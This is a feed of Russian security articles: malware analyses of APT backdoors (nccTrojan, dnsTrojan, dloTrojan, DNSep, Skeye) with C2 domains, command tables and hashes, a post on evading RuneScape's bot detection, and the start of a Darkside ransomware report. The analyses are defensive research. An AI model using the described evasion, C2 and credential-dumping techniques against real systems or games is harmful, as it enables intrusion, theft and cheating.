  • уровень привилегий пользователя в системе (SYSTEM, Administrator или User),
  • IP-адреса зараженной системы,
  • идентификатор версии операционной системы,
  • язык системы.

При этом из собранных данных формируется строка, которая дальше зашифровывается и отправляется на сервер управления. Формат создаваемой строки:


passwd|#|<check_sum>|#|<computer_name>|#|<user_name>|#|<user_privilege>|#|<ip_addr_1 / ip_addr_2 / ...>|#|None|#|v2.2[Service]|#|<os_version_ID>|#|<language_ID>


Далее вредоносная программа переходит к взаимодействию с сервером управления и может исполнять команды, приведенные в табл. 6.


Табл. 6. Команды, исполняемые nccTrojan


Команда Назначение
0x2 Запустить сmd-шелл
0x3 Выполнить команду через cmd-шелл
0x4 Записать данные в файл
0x5 Получить информацию о дисках C-Z (тип, свободный объем памяти)
0x6 Получить информацию о файлах
0x8 Запустить процесс
0xA Удалить файл или директорию
0xC Прочитать файл
0xF Проверить наличие файла
0x11 Сохранить файл
0x13 Получить список запущенных процессов
0x15 Завершить процесс
0x17 Скопировать файл
0x1A Переместить файл
0x1D Запустить cmd-шелл с правами пользователя

dnsTrojan


Следующий бэкдор мы обнаружили впервые: на момент расследования мы не нашли упоминаний о нем в отчетах других экспертов. Его отличительная особенность общение с сервером управления через DNS. В остальном по своей функциональности вредоносная программа схожа с бэкдором nccTrojan. Чтобы сохранить единообразие в названиях найденной малвари, назвали ее dnsTrojan.


В рамках инцидента обнаружен CAB-архив, содержащий вредоносный исполняемый файл (MD5: a3e41b04ed57201a3349fd42d0ed3253). Характеристики образца, который мы вытащила в ходе расследования, приведены в табл. 7.


Табл. 7. Свойства анализируемого образца dnsTrojan
Свойство EXE
Имя a.exe.ok
Тип файла PE32 executable (EXE)
Размер (в байтах) 417 280
Время компиляции 13 октября 2020 года 20:05:59
MD5 a3e41b04ed57201a3349fd42d0ed3253
SHA-1 172d9317ca89d6d21f0094474a822720920eac02
SHA-256 826df8013af53312e961838d8d92ba24de19f094f61bc452cd6ccb9b270edae5

Запуск dnsTrojan


В файле захардкоржена строка AB0d3d3MS5kb3RvbWF0ZXIuY2x1Yjsw, которая является некоей конфигурацией. Вредоносная программа проверяет внутри этой строки третий байт и в зависимости от его значения выбирает свою рабочую директорию и некоторую функциональность:


  • b"30" ('0') вредоносная программа работает в своей текущей директории, в реестр не прописывается, по завершении исполнения все созданные в процессе функционирования файлы: LiveUpdate.exe, ccL100U.dll и сам исполняемый файл удаляются (конфигурация анализируемого образца);
  • b"31" ('1') вредоносная программа работает в %AppData%\Sep, прописывается в реестре, по завершении исполнения удаляется только сам исполняемый файл.

Подстрока d3d3MS5kb3RvbWF0ZXIuY2x1Yjsw представляет собой закодированную в base64 конфигурацию сервера управления www1.dotomater.club;0.


После запуска вредоносная программа извлекает из ресурсов, распаковывает и сохраняет в рабочей директории два файла:


  • LiveUpdate.exe (MD5: 1a7f595ba8c28974619582040dcad404),
  • ccL100U.dll (MD5: 0697433432d209c1ed95f6f75a111234).

Далее запускается файл LiveUpdate.exe, имеющий цифровую подпись Symantec Corporation.


В этом случае злоумышленники снова используют технику DLL hijacking: легитимная DLL заменяется на вредоносную ccL100U.dll. В результате исполнения кода библиотеки из ее ресурсов извлекается и распаковывается код самого бэкдора, который внедряется и исполняется в памяти легитимного процесса dllhost.exe. Для внедрения кода применяется техника Process Hollowing.


Если вредоносная программа прописывается в реестр, в ключ реестра HKCU\Environment добавляется параметр UserInitMprLogonScript со значением %AppData%\Roaming\Sep\LiveUpdate.exe.


Работа dnsTrojan


Все свои действия вредоносная программа логирует в файл %ProgramData%\logD.dat, при этом записанные данные похожи на отладочную информацию для злоумышленников (рис. 7).



Рис. 7. Фрагмент файла logD.dat


Закодированная в base64 конфигурация содержит адреса сервера управления и DNS-сервера. В текущем семпле раскодированная конфигурация выглядит так: www1.dotomater.club;0, то есть адрес конкретного DNS-сервера злоумышленников отсутствует, а для взаимодействия с сервером управления используется DNS-сервер зараженной системы.


Взаимодействие с сервером управления осуществляется с использованием DNS-туннелирования. Данные передаются серверу управления в виде DNS-запроса TXT-записи в зашифрованном виде.


Сразу после запуска на сервер управления отправляются следующие данные:


  • имя компьютера,
  • имя пользователя,
  • текущие дата и время,
  • версия операционной системы,
  • информация о сетевом адаптере,
  • архитектура процессора.

Из них формируется сообщение вида 8SDXCAXRZDJ;O0V2m0SImxhY;6.1.1;1;00-13-d2-e3-d6-2e;2020113052831619.


Все передаваемые на сервер управления данные преобразуются следующим образом:


  • шифруются с помощью алгоритма AES-128-CBC, ключ шифрования вырабатывается из константной строки dadadadadadadada с помощью функции CryptDeriveKey();
  • кодируются в base64.

При формировании домена, для которого запрашивается TXT-запись, после каждого 64-го символа ставится точка. Запросы, отправляемые вредоносной программой, можно увидеть на рис. 8.



Рис. 8. Пример трафика вредоносной программы dnsTrojan

В ответ на запрос, отправленный на предыдущем шаге из TXT-записей, dnsTrojan получает команды сервера и может исполнить их (табл. 8).


Табл. 8. Команды, исполняемые dnsTrojan
Команда Назначение
0x1 Получить онлайн-данные
0x2 Запустить сmd-шелл
0x3 Выполнить команду через cmd-шелл
0x4 Получить информацию о дисках CZ (тип, свободный объем памяти) или файлах
0x6 Прочитать файл
0x7 Скопировать файл
0x8 Удалить файл
0x9 Проверить наличие файла
0xA Сохранить файл
0xB Установить время бездействия программы (в минутах)
0xD Самоудалиться (очистить реестр)

dloTrojan


dloTrojan еще одна обнаруженная в процессе расследования вредоносная программа, которую мы классифицировали как бэкдор. Эта малварь не относится ни к одному из известных семейств вредоносов.


В процессе исполнения кода расшифровывается строка dlo, поэтому по аналогии с предыдущими двумя программами мы назвали ее dloTrojan.


Характеристики файлов исследуемого нами образца приведены в табл. 9.


Табл. 9. Свойства анализируемого экземпляра dloTrojan
Свойство EXE DLL
Имя ChromeFrameHelperSrv.exe chrome_frame_helper.dll
Тип файла PE32 executable (EXE) PE32 executable (DLL)
Размер (в байтах) 82 896 240 128
Время компиляции 12 июля 2013 года 19:11:41 14 сентября 2020 года 16:34:44
MD5 55a365b1b7c50887e1cb99010d7c140a bd23a69c2afe591ae93d56166d5985e1
SHA-1 6319b1c831d791f49d351bccb9e2ca559749293c 3439cf6f9c451ee89d72d6871f54c06cb0e0f1d2
SHA-256 be174d2499f30c14fd488e87e9d7d27e0035700cb2ba4b9f46c409318a19fd97 f0c07f742282dbd35519f7531259b1a36c86313e0a5a2cb5fe1dadcf1df9522d

Запуск dloTrojan


На сцену опять выходит DLL hijacking.


Итак, вредоносная программа dloTrojan состоит из двух компонентов:


  • ChromeFrameHelperSrv.exe невредоносный исполняемый файл (EXE), имеющий цифровую подпись Google Inc.,
  • chrome_frame_helper.dll вредоносная динамическая библиотека (DLL).

После запуска исполняемого EXE-файла подгружается код вредоносной DLL. При этом библиотека проверяет имя процесса, в который она загружена, и оно должно соответствовать имени ChromeFrameHelperSrv.exe. В противном случае, вредоносный код завершит свое исполнение.


Далее библиотека расшифровывает вредоносный исполняемый файл, код которого внедряется в еще один запущенный процесс ChromeFrameHelperSrv.exe с использованием техники Process Hollowing.


Работа dloTrojan


Вредоносная программа пытается получить данные значения с именем TID из одного из двух ключей реестра (это зависит от имеющихся привилегий в системе):


  • HKLM\Software\VS,
  • HKCU\Software\VS.

Если же значение в реестре отсутствует, создается один из указанных ключей реестра. В параметре TID прописывается строка из 16 произвольных символов, которую в дальнейшем можно рассматривать как ID зараженной системы.


Далее dloTrojan проверяет наличие подключения к сети в зараженной системе. Для этого она пытается установить соединение с www.microsoft[.]com.


Строки во вредоносной программе зашифрованы методом простого сложения по модулю двух с одним байтом (отличается для различных строк).


Затем малварь расшифровывает адрес сервера управления. В зависимости от конфигурации вредоносная программа может иметь несколько адресов, в текущей конфигурации адрес сервера управления один.


Теперь dloTrojan устанавливает соединение с сервером управления. Если подключиться к серверу не удалось, малварь пытается найти настроенные прокси-серверы одним из способов:


  • вызывает функцию InternetQueryOptionA() с параметром INTERNET_OPTION_PROXY и получает список доступных прокси-серверов;
  • достает из реестра HKEY_USERS\<user_SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings из параметра ProxyServer.

Далее на сервер управления отправляется следующая информация о зараженной системе:


  • имя компьютера,
  • имя пользователя;
  • IP-адреса зараженной системы,
  • сведения о версии операционной системы,
  • принадлежность компьютера к рабочей группе или домену,
  • идентификатор оригинального производителя оборудования результат работы функции GetOEMCP(),
  • ID, хранимый в реестре.

Данные передаются на сервер управления в зашифрованном виде.


В конце концов вредоносная программа получает возможность исполнять команды сервера управления: запускать cmd-шелл, создавать и удалять файлы, собирать информацию о дисках.


Перечень возможных команд приведен в табл. 10.


Табл. 10. Команды, исполняемые dloTrojan


Команда Назначение
0x1 Получить количество миллисекунд, прошедших с момента запуска системы
0x2 Запустить сmd-шелл
0x3 Выполнить команду через cmd-шелл
0x4 Закрыть cmd-шелл
0x5 Проверить существование файла. Если файла нет, создать его
0x6 Создать файл
0x7 Получить данные файла (размер, временные метки)
0x8 Прочитать файл
0x9 Получить информацию о дисках CZ (тип, объем свободной памяти)
0xA Перечислить файлы
0xB Удалить файл
0xC Переместить файл
0xD Запустить процесс
0xE Сделать скриншот
0xF Перечислить сервисы
0x10 Запустить сервис
0x11 Перечислить процессы и модули
0x12 Завершить процесс, затем перечислить процессы и модули
0x13 Закрыть сокет

И еще несколько программ, которые мы раскопали в ходе расследования


Вернемся к общедоступным утилитам, найденным на зараженных системах. С их помощью можно залезть в систему, утащить конфиденциальные данные и выполнить другие вредоносные действия. Ловите краткое описание каждой.


GetPassword


GetPassword предназначена для получения паролей из зараженной системы. Раньше исходный код утилиты лежал в репозитории MimikatzLite, но сейчас его почему-то удалили. Можем только поделиться скриншотом на рис. 9.



Рис. 9. Скриншот работы утилиты GetPassword


Quarks PwDump


Еще одна утилита для извлечения паролей из ОС Windows.


Исходный код можно найти в репозитории 0daytool-quarkspwdump. Скриншот утилиты приведен на рис. 10.



Рис. 10. Скриншот работы утилиты Quarks PwDump


wpmd v 2.3 (beta)


wpmd (windows password and masterkey decrypt) также предназначена для получения паролей в ОС Windows. Увы, источник мы не нашли, поэтому можем только показать скриншот (рис. 11).



Рис. 11. Скриншот работы утилиты wpmd v 2.3 (beta)


os.exe


os.exe позволяет определить версию ОС Windows (рис. 12). Источник тоже не найден :(



Рис. 12. Скриншот работы утилиты os.exe


nbtscan 1.0.35


nbtscan утилита командной строки, предназначенная для сканирования открытых серверов имен NETBIOS в локальной или удаленной TCP/IP-сети. Она обеспечивает поиск открытых общих ресурсов (рис. 13). Доступна на ресурсе Unixwiz.net.



Рис. 13. Скриншот работы утилиты nbtscan


Это расследование в очередной раз убедило нас, что даже заезженные и понятные техники способны доставить жертвам много неприятностей. Злоумышленники могут годами копаться в IT-инфраструктуре жертвы, которая и подозревать ничего не будет. Думаем, выводы вы сделаете сами :)


Напоследок хотим поделиться индикаторами компрометации:

PlugX (SHA256: EXE, DLL, Shell-code)


3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe2f81cf43ef02a4170683307f99159c8e2e4014eded6aa5fc4ee82078228f6c3c0c831e5c3aecab14fe98ff4f3270d9ec1db237f075cd1fae85b7ffaf0eb2751e94004d84edf72720b270a49bf673c98aba2e4da65dc5a8542566cec073ee7812e3fcb055cf50884a192aca2f958f899eb0033c1a1b923deb7d56baaca9d7122d55efc36799631f12f54dfa574aafa1c8e1d4d1b659c159253987d24fecc3218518a98c2d905a1da1d9d855e86866921e543f4bf8621faea05eb14d8e5b23b60c68d58f68591a8306b15de98913897a34bc96ffc6db10e4113144cc54aaa0dda45697c9086fd5abd030ceb937c396c6893ecc8d4a848785fac61ce13d5740edca3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe97ad6e95e219c22d71129285299c4717358844b90860bb7ab16c5178da3f168681e53c7d7c8aa8f98c951106a656dbe9c931de465022f6bafa780a6ba96751eb

PlugX-executor: (SHA256: EXE)


2f73a3c7fa58d93d60d3011724af2c7beddc39469c0613ce097657849ab32e8243f1bd29811393476320542473d6c1dedea172a62ccf1a876a04a53ed876f3a4

nccTrojan (SHA256: EXE, DLL)


07d728aa996d48415f64bac640f330a28e551cd565f1c5249195477ccf7ecfc53be516735bafbb02ba71d56d35aee8ce2ef403d08a4dc47b46d5be96ac342bc9

dnsTrojan (SHA256: EXE)


826df8013af53312e961838d8d92ba24de19f094f61bc452cd6ccb9b270edae5

dloTrojan (SHA256: EXE, DLL)


be174d2499f30c14fd488e87e9d7d27e0035700cb2ba4b9f46c409318a19fd97f0c07f742282dbd35519f7531259b1a36c86313e0a5a2cb5fe1dadcf1df9522d
Подробнее..

Исследование целевых атак на российские НИИ

02.04.2021 14:12:19 | Автор: admin

В конце сентября 2020 года в вирусную лабораторию Доктор Веб за помощью обратился один из российских научно-исследовательских институтов. Сотрудники НИИ обратили внимание на ряд технических проблем, которые могли свидетельствовать о наличии вредоносного ПО на одном из серверов локальной сети. В ходе расследования мы установили, что на НИИ была осуществлена целевая атака с использованием ряда специализированных бэкдоров. Изучение деталей инцидента показало, что сеть института была скомпрометирована задолго до обращения к нам и, судя по имеющимся у нас данным, не одной APT-группой.

В этой статье мы восстановим хронологию заражения сети, идентифицируем обнаруженные бэкдоры и обратим внимание на выявленные пересечения в их коде и сетевой инфраструктуре. Также мы попробуем ответить на вопрос: кто стоит за атаками?

Восстанавливаем события

Мы считаем, что найденные в сети бэкдоры принадлежат двум разным хакерским группировкам. Для удобства обозначим их как APT-группа 1 и APT-группа 2.

В ходе расследования было установлено, что APT-группа 1 скомпрометировала внутреннюю сеть института осенью 2017 года. Первичное заражение осуществлялось с помощьюBackDoor.Farfli.130 модификации бэкдора, также известного как Gh0st RAT. Позднее, весной 2019 года в сети был установлен Trojan.Mirage.12, а в июне 2020 BackDoor.Siggen2.3268.

APT-группа 2 скомпрометировала сеть института не позднее апреля 2019, и в этот раз заражение началось с установки бэкдораBackDoor.Skeye.1. В процессе работы мы также выяснили, что примерно в то же время в мае 2019 года Skeye был установлен в локальной сети другого российского НИИ.

Тем временем в июне 2019 года компания FireEye опубликовала отчет о целевой атаке на государственный сектор ряда стран центральной Азии с использованием Skeye. Позднее, в период с августа по сентябрь 2020 года вирусные аналитики Доктор Веб зафиксировали установку различных троянов APT-группой 2 в сети пострадавшего НИИ, включая ранее не встречавшийся DNS-бэкдорBackDoor.DNSep.1, а также хорошо известный BackDoor.PlugX.

Более того, в декабре 2017 года на серверы НИИ был установленBackDoor.RemShell.24. Представители этого семейства ранее были описаны специалистами Positive Technologies в исследовании Operation Taskmasters. При этом мы не располагаем такими данными, которые позволили бы однозначно определить, какая из двух APT-групп использовала этот бэкдор.

Кто стоит за атаками?

Деятельность первой APT-группы не позволяет нам однозначно идентифицировать атаковавших как одну из ранее описанных хакерских группировок. При этом анализ используемых вредоносных программ и инфраструктуры показал, что эта группа активна как минимум с 2015 года.

Второй APT-группой, атаковавшей НИИ, по нашему мнению является TA428, ранее описанная исследователями компании Proofpoint в материале Operation Lag Time IT. В пользу нашего вывода говорят следующие факты:

1) в коде бэкдоров BackDoor.DNSep и BackDoor.Cotx имеются явные пересечения и заимствования;

2) BackDoor.Skeye.1 и Trojan.Loader.661 использовались в рамках одной атаки, при этом последний является известным инструментом TA428;

3) бэкдоры, проанализированные нами в рамках этих атак, имеют пересечения в адресах управляющих серверов и сетевой инфраструктуре с бэкдорами, используемыми группировкой TA428.

Теперь подробнее рассмотрим выявленные связи. На графе приведена часть задействованной в атаке инфраструктуры с пересечениями бэкдоров Skeye и другим известным APT-бэкдором PosionIvy:

связей много, поэтому пожалуйста, масштабируйте, спасибо :)связей много, поэтому пожалуйста, масштабируйте, спасибо :)

На этом графе изображены пересечения в инфраструктуре бэкдоров Skeye и Cotx:

Детальный анализ бэкдора DNSep и его последующее сравнение с кодом бэкдора Cotx выявили сходство как в общей логике обработки команд от управляющего сервера, так и в конкретных реализациях отдельных команд. Мы рассмотрим их ниже.

Другой интересной находкой этого исследования стал бэкдор Logtu, один из его образцов мы ранее описывали в рамках расследования инцидента в Киргизии. Адрес его управляющего сервера совпал с адресом сервера бэкдора Skeye atob[.]kommesantor[.]com. В связи с этим мы также провели сравнительный анализ BackDoor.Skeye.1 с образцами BackDoor.Logtu.1 и BackDoor.Mikroceen.11.

Подробный разбор алгоритмов работы найденных бэкдоров читайте в нашем исследовании на сайте.

Сравнительный анализ кода DNSep и Cotx

Несмотря на то, что каналы связи с управляющим сервером у Cotx и DNSep кардинально различаются, нам удалось найти интересные совпадения в коде обоих бэкдоров.

Функция, отвечающая за обработку команд от управляющего сервера, принимает аргументом структуру:

structst_arg{_BYTE cmd;st_string arg;};

При этом, если нужная функция принимает несколько аргументов, то они все записаны в поле arg с разделителем |.

Набор команд BackDoor.Cotx.1 обширнее, чем у BackDoor.DNSep.1, и включает все команды, которые есть у последнего.

Ниже видно почти полное совпадение кода некоторых функций бэкдоров. При этом следует учитывать, в Cotx используется кодировка Unicode, а в DNSep ANSI.

Обработчик команды на отправку листинга каталога или информации о диске

BackDoor.DNSep.1BackDoor.DNSep.1BackDoor.Cotx.1BackDoor.Cotx.1

Функция получения информации о дисках

BackDoor.DNSep.1BackDoor.DNSep.1BackDoor.Cotx.1BackDoor.Cotx.1

Функция перечисления файлов в папке

BackDoor.DNSep.1BackDoor.DNSep.1BackDoor.Cotx.1BackDoor.Cotx.1

Функция сбора информации о файлах в папке

BackDoor.DNSep.1BackDoor.DNSep.1BackDoor.Cotx.1BackDoor.Cotx.1

Полученные в результате анализа данные позволяют предположить, что при создании бэкдора DNSep его автор имел доступ к исходным кодам Cotx. Поскольку эти ресурсы не являются общедоступными, мы предполагаем, что автор или группа авторов DNSep имеет отношение к группировке TA428. В пользу этой версии говорит и тот факт, что образец DNSep был найден в скомпрометированной сети пострадавшей организации вместе с другими известными бэкдорами TA428.

Сравнительный анализ кода бэкдоров Skeye, Mikroceen, Logtu

В процессе исследования бэкдора Skeye мы обнаружили, что адрес его управляющего сервера также используется бэкдором семейства Logtu. Для сравнительного анализа мы использовали ранее описанные нами образцы BackDoor.Logtu.1 и BackDoor.Mikroceen.11.

Функции логирования

Логирование во всех случаях так или иначе обфусцировано.

  • BackDoor.Mikroceen.11 сообщения в формате %d-%d-%d %d:%d:%d <msg>\r\n записываются в файл %TEMP%\WZ9Jan10.TMP, где <msg> случайная текстовая строка. В образце 2f80f51188dc9aea697868864d88925d64c26abc сообщения записываются в файл 7B296FB0.CAB;

  • BackDoor.Logtu.1 сообщения в формате [%d-%02d-%02d %02d:%02d:%02d] <rec_id> <error_code>\n<opt_message>\n\n перед записью в файл %TEMP%\rar<rnd>.tmp шифруются операцией XOR с ключом 0x31;

  • BackDoor.Skeye.1 сообщения в формате %4d/%02d/%02d %02d:%02d:%02d\t<rec_id>\t<error_code>\n записываются в файл %TEMP%\wcrypt32.dll.

Общая логика последовательности записи сообщений в журнал также схожа у всех трех образцов:

  • начало исполнения фиксируется;

  • в Logtu и Mikroceen в журнал записывается прямое подключение к управляющему серверу;

  • в каждом случае указывается, через какой прокси выполнено подключение к серверу;

  • в случае ошибки на этапе получения прокси из того или иного источника в журнале фиксируется отдельная запись.

Следует заметить, что настолько подробное и при этом обфусцированное логирование встречается крайне редко. Обфускация заключается в том, что в журнал записываются некоторые коды сообщений и в ряде случаев дополнительные данные. Кроме того, в данном случае прослеживается общая схема последовательности записи событий:

  • начало исполнения;

  • попытка подключения напрямую;

  • получение адресов прокси;

  • запись о подключении через тот или иной сервер.

Поиск прокси-сервера

Последовательность соединения с управляющим сервером также выглядит похожей у всех 3 образцов. Первоначально каждый бэкдор пытается подключиться к серверу напрямую, а в случае неудачи может использовать прокси-серверы, адреса которых находятся из трех источников помимо встроенного.

Получение адресов прокси-серверов BackDoor.Mikroceen.11:

  • из файла %WINDIR%\debug\netlogon.cfg;

  • из собственного лог-файла;

  • путем поиска соединений с удаленными хостами через порты 80, 8080, 3128, 9080 в TCP-таблице.

Поиск прокси в своем лог-файле:

Поиск в активных соединениях:

Получение адресов прокси-серверов BackDoor.Logtu.1:

  • из реестра HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer;

  • из раздела HKU реестра по SID активного пользователя;

  • с помощью WinHTTP API WinHttpGetProxyForUrl путем запроса к google.com.

Получение адресов прокси-серверов BackDoor.Skeye.1:

  • из раздела HKCU Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer;

  • из раздела HKU по SID активного пользователя;

  • путем поиска соединений с удаленными хостами через порты 80, 8080, 3128, 9080 в TCP-таблице.

Пересечения в сетевой инфраструктуре

Некоторые образцы совместно использовали одну и ту же сетевую инфраструктуру. Фрагмент графа наглядно показывает взаимосвязь между семействами.

масштабируйте страничку, спасибомасштабируйте страничку, спасибо

Идентификаторы

В образцах Logtu и Mikroceen присутствуют строки, которые используются в качестве идентификаторов сборок или версий. Формат некоторых из них совпадает.

BackDoor.Mikroceen.11

BackDoor.Logtu.1

SHA1

Id

SHA1

id

ce21f798119dbcb7a63f8cdf070545abb09f25ba

intl0113

029735cb604ddcb9ce85de92a6096d366bd38a24

intpz0220

0eb2136c5ff7a92706bc9207da32dd85691eeed5

hisa5.si4

7b652e352a6d2a511f226e4d0cc22f093e052ad8

retail2007

2f80f51188dc9aea697868864d88925d64c26abc

josa5w5n

1c5e5fd53fc2ee778342a5cae3ac2eb0ac345ed7

retail

2e50c075343ab20228a8c0c094722bbff71c4a2a

enc0225

00ddcc200d1031b8639026532c0087bfcc4520c9

716demo

3bd16f11b5b3965a124a6fc3286297e5cfe77715

520299

b599797746ae8ccf7907cf88de232faa30ec95e6

gas-zhi

5eecdf63e85833e712a1ff88df1341bbf32f4ab8

Strive

2d672d7818a56029b337e8792935195d53576a9d

jjlk

bd308f4d1a32096a3b90cfdae45bbc5c13e5e801

R0916

b1be4b2f874c8309f553acce90287c8c6bb2b6b1

frsl.1ply

21ffd24b8074d7cffdf4cc339d1fa8fe892eba27

Wdv

8fbec09e646311a285aee06b3dd45ccf58928703

intz726

19921cc47b3de003186e65fd12b82235030f060d

122764

0f70251abc8c64cbc7b24995c3d32927514d0a4b

V20180224

149947544ca4f7baa5bc3d00b080d0e943d8036b

SOE

e7f5a33b33e023a82ac9eee6ed40e4a38ce95277

int815

b4790eec7daa9f931bed43a53f66168b477599a7

UOE

ab660a3ac46d563c756463bd1b64cc45f347a1f7

B.Z11NOV20D

d0181759a175fbcc60975983b351f88970f484f9

299520

7a63fc9db2bc1e9b1ef793723d5877e6b4c566b8

WinVideo

13779006d0dafbe4b27bd282230df299eef2b8dc

SSLSSL

f53c77695a162c78c68f693f57f65752d17f6030

int007server

924341cab6106ef993b506193e6786e459936069

intl1211

8ebf78c84cd7f66ca8708467a28d83658bcf6710

intl821

f2856d7d138430e164f83662e251ee311950d83c

intl821

Кроме того, в значительном числе образцов данный идентификатор равен значению TEST или test.

Пример в BackDoor.Logtu.1 (9ea2488f07bf3edda23d9b7759c2d0c3c8501f92):

Пример в BackDoor.Mirkoceen.11 (81bb895a833594013bc74b429fb1f24f9ec9df26):

Таким образом, сравнительный анализ выявил у рассмотренных семейств сходства в:

  • логике ведения журнала событий и его обфускации;

  • логике подключения к управляющему серверу и алгоритмах поиска адресов прокси;

  • используемой сетевой инфраструктуре.

Заключение

В ходе расследования атак на российские НИИ наши вирусные аналитики нашли и описали несколько семейств целевых бэкдоров, включая ранее неизвестные образцы. Следует отдельно отметить длительное скрытое функционирование вредоносных программ в скомпрометированной сети пострадавшей организации несанкционированное присутствие первой APT-группы оставалось незамеченным с 2017 года.

Характерной особенностью является наличие пересечений в коде и сетевой инфраструктуре проанализированных образцов. Мы допускаем, что выявленные связи указывают на принадлежность рассмотренных бэкдоров к одним и тем же хакерским группировкам.

Специалисты компании Доктор Веб рекомендуют производить регулярный контроль работоспособности важных сетевых ресурсов и своевременно обращать внимание на сбои, которые могут свидетельствовать о наличии в сети вредоносного ПО. Основная опасность целевых атак заключается не только в компрометации данных, но и в длительном присутствии злоумышленников в корпоративной сети. Такой сценарий позволяет годами контролировать работу организации и в нужный момент получать доступ к чувствительной информации. При подозрении на вредоносную активность в сети мы рекомендуем обращаться в вирусную лабораторию Доктор Веб, которая оказывает услуги по расследованию вирусозависимых компьютерных инцидентов. Оперативное принятие адекватных мер позволит сократить ущерб и предотвратить тяжелые последствия целевых атак.

Индикаторы компрометации

Подробнее..

Перевод Как Runescape ловит ботоводов, и почему она не поймала меня

05.04.2021 12:20:40 | Автор: admin

Автоматизация действий игрока всегда была серьёзной проблемой таких MMORPG, как World of Warcraft и Runescape. Подобный взлом игр сильно отличается от традиционных читов, например, в шутерах.

В один из выходных я решил изучить системы обнаружения, используемые Jagex для предотвращения автоматизации действий игрока в Runescape.

Ботоводство


Последние несколько месяцев аккаунт sch0u круглосуточно играл на сервере world 67, выполняя такие монотонные задачи, как убийство мобов и сбор ресурсов. На первый взгляд, этот аккаунт похож на любого другого игрока, но есть одно важное отличие: это бот.


Я запустил этого бота ещё в октябре, чтобы проверить возможности системы распознавания ботов. Попробовав найти информацию о том, как Jagex борется с ботоводами, я обнаружил только видео платных ботов, разработчики которых хвастались тем, что их системы перемещения мыши неотличимы от действий человека.

Поэтому единственное, что я смог понять это важность перемещений мыши, но так ли это на самом деле?

Эвристики!


Для подтверждения этой теории я начал с изучения клиента Runescape и почти сразу заметил глобальную переменную hhk, задаваемую вскоре после запуска.

const auto module_handle = GetModuleHandleA(0);hhk = SetWindowsHookExA(WH_MOUSE_LL, rs::mouse_hook_handler, module_handle, 0);

Этот код устанавливает на мышь низкоуровневый перехватчик, прицепляемый к системной цепочке перехватчиков. Это позволяет приложениям под Windows перехватывать все события мыши, даже если они не связаны с конкретным приложением. Низкоуровневые перехватчики (хуки) часто используются кейлоггерами, но могут применяться и в мирных целях, например, в эвристиках, как вышеупомянутый перехватчик мыши.

По сути, обработчик мыши в Runescape довольно прост (псевдокод для красоты был подправлен вручную):

LRESULT __fastcall rs::mouse_hook_handler(int code, WPARAM wParam, LPARAM lParam){  if ( rs::client::singleton )  {      // Call the internal logging handler      rs::mouse_hook_handler_internal(rs::client::singleton->window_ctx, wParam, lParam);  }  // Pass the information to the next hook on the system  return CallNextHookEx(hhk, code, wParam, lParam);}

void __fastcall rs::mouse_hook_handler_internal(rs::window_ctx *window_ctx, __int64 wparam, _DWORD *lparam){  // If the mouse event happens outside of the Runescape window, don't log it.  if (!window_ctx->event_inside_of_window(lparam))  {    return;  }  switch (wparam)  {    case WM_MOUSEMOVE:      rs::heuristics::log_movement(lparam);      break;        case WM_LBUTTONDOWN:    case WM_LBUTTONDBLCLK:    case WM_RBUTTONDOWN:    case WM_RBUTTONDBLCLK:    case WM_MBUTTONDOWN:    case WM_MBUTTONDBLCLK:      rs::heuristics::log_button(lparam);      break;  }}

для снижения нагрузки на канал эти функции rs::heuristics::log_* используют простые алгоритмы для пропуска данных событий, напоминающих ранее зафиксированные события.

Позже эти данные событий парсятся функцией rs::heuristics::process, которая вызывается в каждом кадре основного цикла рендеринга.

void __fastcall rs::heuristics::process(rs::heuristic_engine *heuristic_engine){  // Don't process any data if the player is not in a world  auto client = heuristic_engine->client;  if (client->state != STATE_IN_GAME)  {    return;  }  // Make sure the connection object is properly initialised  auto connection = client->network->connection;  if (!connection || connection->server->mode != SERVER_INITIALISED)  {    return;  }  // The following functions parse and pack the event data, and is later sent  // by a different component related to networking that has a queue system for  // packets.  // Process data gathered by internal handlers  rs::heuristics::process_source(&heuristic_engine->event_client_source);  // Process data gathered by the low level mouse hook  rs::heuristics::process_source(&heuristic_engine->event_hook_source);}

Away from keyboard?


В процессе реверс-инжиниринга я пытался разобраться в важности для меня каждой изучаемой функции, обычно создавая хуки или патчи этих функций. Обычно можно понять, относится ли функция к делу, сделав её бесполезной и наблюдая за состоянием ПО. Такая методология исследования привела к интересному наблюдению.

Запретив игре вызывать функцию rs::heuristics::process, я поначалу ничего не заметил, однако спустя ровно пять минут меня разлогинил сервер. Очевидно, Runescape определяет неактивность игрока исключительно по передаваемым клиентом на сервер данным эвристик, даже если вы вполне нормально можете играть. Это вызвало новый вопрос: если сервер думает, что я не играю, думает ли он, что я играю ботом?.

После этого я потратил ещё несколько дней на реверс-инжиниринг сетевого слоя игры, благодаря чему мой бот теперь может делать почти что угодно при помощи одних сетевых пакетов.

Для подтверждения своей теории я круглосуточно и семь дней в неделю занимался ботоводством, даже не двигая мышью. Проведя так тысячи часов, я могу со всей уверенностью сказать, что или система обнаружения ботов использует только данные событий эвристик, отправляемых серверу клиентом, или работает только когда игрок не afk. Любой игрок, которому удаётся играть, не двигая курсором, должен быть немедленно забанен, то есть разработчикам стоит обратить внимание на эту недоработку.

Подробнее..

Перевод Darkside возвращается анализ крупномасштабной кампании по хищению данных

05.04.2021 20:15:29 | Автор: admin

Наша команда недавно провела несколько резонансных расследований атак, приписываемых группировке киберпреступников Darkside. Эти узконаправленные кампании проводились в несколько этапов и длились от нескольких недель до нескольких месяцев, а их целью было хищение и шифрование конфиденциальных данных, включая резервные копии. В этой статье мы рассмотрим замеченные нами тактики, техники и процедуры (ТТП).

О группе Darkside Inc.


Группировка хакеров-вымогателей Darkside выпустила пресс-релиз о своем продукте RaaS (программа-вымогатель как услуга) в августе 2020 года. С тех пор группировка получила известность благодаря профессиональному проведению операций и крупным суммам требуемых выкупов. Хакеры предоставляют жертвам техподдержку в веб-чате, создают сложные системы хранения украденных данных с резервными подсистемами и анализируют финансовую ситуацию жертв перед атакой.

Название группировки Darkside (Темная сторона) вызывает ассоциации с хорошим парнем (или девушкой), которые отреклись от светлой стороны. Мы не можем утверждать, что в группировке работают бывшие специалисты в области ИТ-безопасности, но ее атаки свидетельствуют о глубоком понимании инфраструктуры, технологий безопасности и слабых сторон своих жертв.

